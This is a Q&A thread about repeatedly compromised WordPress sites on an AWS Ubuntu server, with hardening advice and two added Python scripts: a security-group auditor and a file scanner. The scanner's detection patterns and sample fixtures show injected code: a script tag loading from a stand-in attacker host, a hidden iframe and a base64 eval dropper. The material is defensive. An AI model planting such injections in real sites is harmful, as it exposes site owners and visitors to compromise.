
Admittedly, I am fairly new to Ubuntu server management. I have an AWS server that keeps getting compromised and injecting tags into all the files for all of the sites on the server. I don't really know what I'm doing wrong or what to do to prevent it. Any help would be much appreciated.

  • Running AWS Ubuntu 18.04 servers
  • Security groups set up to not allow port 80
  • No FTP rules - only SSH (and restricted to my IP)

What am I missing?

fischgeek
  • Read up on server hardening. Patching OS and software regularly, strong passwords, and make sure administration can only be done from known good IP addresses would be a start – Tim Nov 29 '20 at 19:56
  • Thanks @Tim - any sources you would recommend? – fischgeek Nov 29 '20 at 20:12

2 Answers


injecting tags into all the files for all of the sites on the server

That looks like a website compromise, not necessarily a server compromise (although that's possible too).

My guess is that your website has vulnerabilities and these are exploited by the attackers to insert their own content on the pages. If the website is Wordpress, Drupal, Joomla or something like that make sure that you've got the latest version, that all the plugins are updated, that you only have the necessary plugins installed, etc.

Google something like "securing a wordpress website" (or drupal website, etc) - there'll be plenty of pages to learn from.

Hope that helps :)

MLu
  • Thank you. I appreciate the input. They are Wordpress sites and are all on the latest and have very minimal plugins. I also turned on automatic updates on everything. So, that's why I thought maybe the server itself was getting compromised because it's happening to all the sites. Seems likely, doesn't it? – fischgeek Nov 29 '20 at 20:16
  • @fischgeek Ubuntu 18.04 is fairly secure out of the box, there's not much that can be attacked. Only permit access on website ports 80 and 443 from the internet and for the management only open port 22 from your IP (check with [ifconfig.co](https://ifconfig.co) ) in the Security Group - then it should be reasonably secure and the only attack vector will be the Wordpress. Makes sense? – MLu Nov 29 '20 at 20:22
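The security-group rule MLu describes (80/443 open to the world, SSH only from one admin address, nothing else inbound) is easy to state and easy to drift away from. The script below is an added example, not code from either answer: it audits the JSON that `aws ec2 describe-security-groups --output json` returns and flags every rule that breaks that policy. The sample document, the group ID and the admin CIDR 203.0.113.7/32 are constructed for the example.

```python
import json

# Constructed sample in the shape returned by
# `aws ec2 describe-security-groups --output json` (not real account data).
SAMPLE_DESCRIBE_OUTPUT = json.dumps({
    "SecurityGroups": [{
        "GroupId": "sg-0123456789abcdef0",
        "GroupName": "web-sg",
        "IpPermissions": [
            {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
             "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
            {"IpProtocol": "tcp", "FromPort": 80, "ToPort": 80,
             "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
            {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
             "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
             "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
            {"IpProtocol": "tcp", "FromPort": 3306, "ToPort": 3306,
             "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
            {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
             "IpRanges": [{"CidrIp": "203.0.113.7/32"}], "Ipv6Ranges": []},
        ],
    }]
})

PUBLIC_WEB_PORTS = {80, 443}          # the only ports allowed from anywhere
ANYWHERE = {"0.0.0.0/0", "::/0"}


def _sources(perm):
    """Yield every source CIDR (IPv4 and IPv6) of one IpPermissions entry."""
    for r in perm.get("IpRanges", []):
        yield r["CidrIp"]
    for r in perm.get("Ipv6Ranges", []):
        yield r["CidrIpv6"]


def audit_group(group, admin_cidr):
    """Return (port_label, source, reason) findings for one security group.

    Policy: SSH (22) only from admin_cidr; only 80/443 may be open to the
    internet; an all-traffic rule (IpProtocol "-1") from anywhere is flagged.
    """
    findings = []
    for perm in group.get("IpPermissions", []):
        proto = perm.get("IpProtocol")
        if proto == "-1":                       # "all traffic" rule has no ports
            label, ports = "all traffic", None
        else:
            lo, hi = perm.get("FromPort"), perm.get("ToPort")
            label = f"{proto}/{lo}" if lo == hi else f"{proto}/{lo}-{hi}"
            ports = set(range(lo, hi + 1)) if lo is not None else None
        for src in _sources(perm):
            if ports is not None and 22 in ports and src != admin_cidr:
                findings.append((label, src, "SSH reachable from a non-admin source"))
            elif src in ANYWHERE and (ports is None or not ports <= PUBLIC_WEB_PORTS):
                findings.append((label, src, "non-web port open to the internet"))
    return findings


def audit_describe_output(raw_json, admin_cidr):
    """Audit every group in a describe-security-groups JSON document."""
    doc = json.loads(raw_json)
    return {g["GroupId"]: audit_group(g, admin_cidr) for g in doc["SecurityGroups"]}


if __name__ == "__main__":
    report = audit_describe_output(SAMPLE_DESCRIBE_OUTPUT, "203.0.113.7/32")
    for gid, findings in report.items():
        print(gid)
        for label, src, reason in findings:
            print(f"  {label:<12} from {src:<18} {reason}")
```

On the sample the two offending rules are SSH from 0.0.0.0/0 and MySQL (3306) from 0.0.0.0/0; the 80/443 rules and the SSH rule from the admin /32 pass. A flagged rule is removed with `aws ec2 revoke-security-group-ingress --group-id sg-... --protocol tcp --port 22 --cidr 0.0.0.0/0`. Keep in mind that the security group only limits where attacks can come from; as MLu says, with this in place the remaining attack surface is the WordPress sites themselves, and an attacker who already has a PHP backdoor on the box does not need port 22.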

I have had some of this fun in a previous life with Wordpress sites.

I found https://www.wordfence.com/ super useful in finding all the files in the sites that had been compromised. Once you are compromised, you can find the attackers have left several ways for you to be compromised again. I would run this; it will verify that your installations and files are no longer compromised.

To verify you have got your security in line in AWS, run the excellent tools linked below. They can be a little overwhelming at first but are worth the investment if you're going to run long term in AWS.

Scout suite https://github.com/nccgroup/ScoutSuite

Prowler https://github.com/toniblyx/prowler

If you are new to managing WordPress sites in AWS then you cannot go far wrong with something like the Bitnami WordPress images https://bitnami.com/stack/wordpress/virtual-machine. These are out-of-the-box setups with reasonably good configuration and practices for hosting from the get-go. They do come with some drawbacks we found with major upgrades, but there is plenty of documentation on managing that.

Checking your logs is also a good way to potentially spot what is compromising you and give you some Google paths to go down.

If you want to carry on adding layers, take a look at WAF in AWS (https://aws.amazon.com/waf/). That will give you some extra protection if you are still getting problems.

HTH, I feel your pain.

JamesKn
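The "find every file the attackers touched and every backdoor they left" step that this answer hands to Wordfence can also be done, in a first pass, with a small scanner of your own. The script below is an added example and is not Wordfence's signature set or anything from the answers: it walks a WordPress docroot and reports the classic indicators behind "tags injected into every file" (a `<script src>` pointing at a host you do not own, a zero-sized or hidden iframe, `eval(base64_decode(...))` in PHP, and any `.php` file under `wp-content/uploads`, where executable code should never live). The indicator regexes, the allowed-host list and the mini docroot it builds in a temporary directory are constructed for the example.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Content indicators. Assumed, illustrative set; real scanners ship far more.
INDICATORS = {
    # eval(base64_decode(...)) or eval(gzinflate(base64_decode(...))): PHP dropper
    "php_eval_base64": re.compile(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(", re.I),
    # a very long base64 literal handed straight to a decoder (staged loader)
    "php_long_base64": re.compile(
        r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{200,}['\"]", re.I),
    # 0x0-sized or display:none iframe, the usual drive-by injection
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*(?:\bwidth\s*=\s*['\"]?0\b|\bheight\s*=\s*['\"]?0\b|display\s*:\s*none)",
        re.I),
}
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def scan_text(text, allowed_hosts):
    """Return the sorted indicator names matching one file's contents.

    Any <script src> whose host is not in allowed_hosts is reported as
    'foreign_script_src'; relative and same-host script tags are ignored.
    """
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    for m in SCRIPT_SRC.finditer(text):
        host = urlparse(m.group(1)).hostname
        if host and host.lower() not in allowed_hosts:
            hits.add("foreign_script_src")
    return sorted(hits)


def scan_tree(root, allowed_hosts, exts=(".php", ".html", ".htm", ".js")):
    """Walk a WordPress docroot; return {relative_path: [indicators]} for hits.

    Every .php file under wp-content/uploads is reported regardless of its
    contents: uploads should hold media, never executable PHP.
    """
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            hits = []
            if rel.startswith("wp-content/uploads/") and fn.lower().endswith(".php"):
                hits.append("php_in_uploads")
            if fn.lower().endswith(exts):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_text(fh.read(), allowed_hosts))
            if hits:
                report[rel] = sorted(set(hits))
    return report


def build_sample_site():
    """Create a constructed mini docroot (sample data, not a real compromise)."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    files = {
        "index.php":
            "<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';\n",
        "wp-content/themes/twentytwenty/footer.php":
            "<?php wp_footer(); ?>\n"
            "<script src=\"https://cdn.evil.example/loader.js\"></script>\n"
            "<iframe src=\"https://cdn.evil.example/f.html\" width=\"0\" height=\"0\"></iframe>\n",
        "wp-content/uploads/2020/11/cache.php":
            "<?php eval(gzinflate(base64_decode('eNpLTEpmBAAClAEM'))); ?>\n",
        "wp-includes/js/jquery/jquery.js":
            "/*! jQuery v3.5.1 */ (function(){})();\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, hits in sorted(scan_tree(site, {"cdn.example.com"}).items()):
        print(f"{rel}: {', '.join(hits)}")
```

On the sample site the themed footer is reported for the foreign script tag and the hidden iframe, and the file in uploads for both its location and the `eval(base64_decode(...))` payload; `index.php` and the bundled jQuery are clean. A scanner like this tells you which files to look at, not that the rest are clean: a file you own that matches nothing can still carry a modified line, so compare core, theme and plugin files against fresh copies of the same versions before you trust them, and treat a recurring reinfection as a sign that a backdoor, a stolen credential or a writable docroot survived the last cleanup.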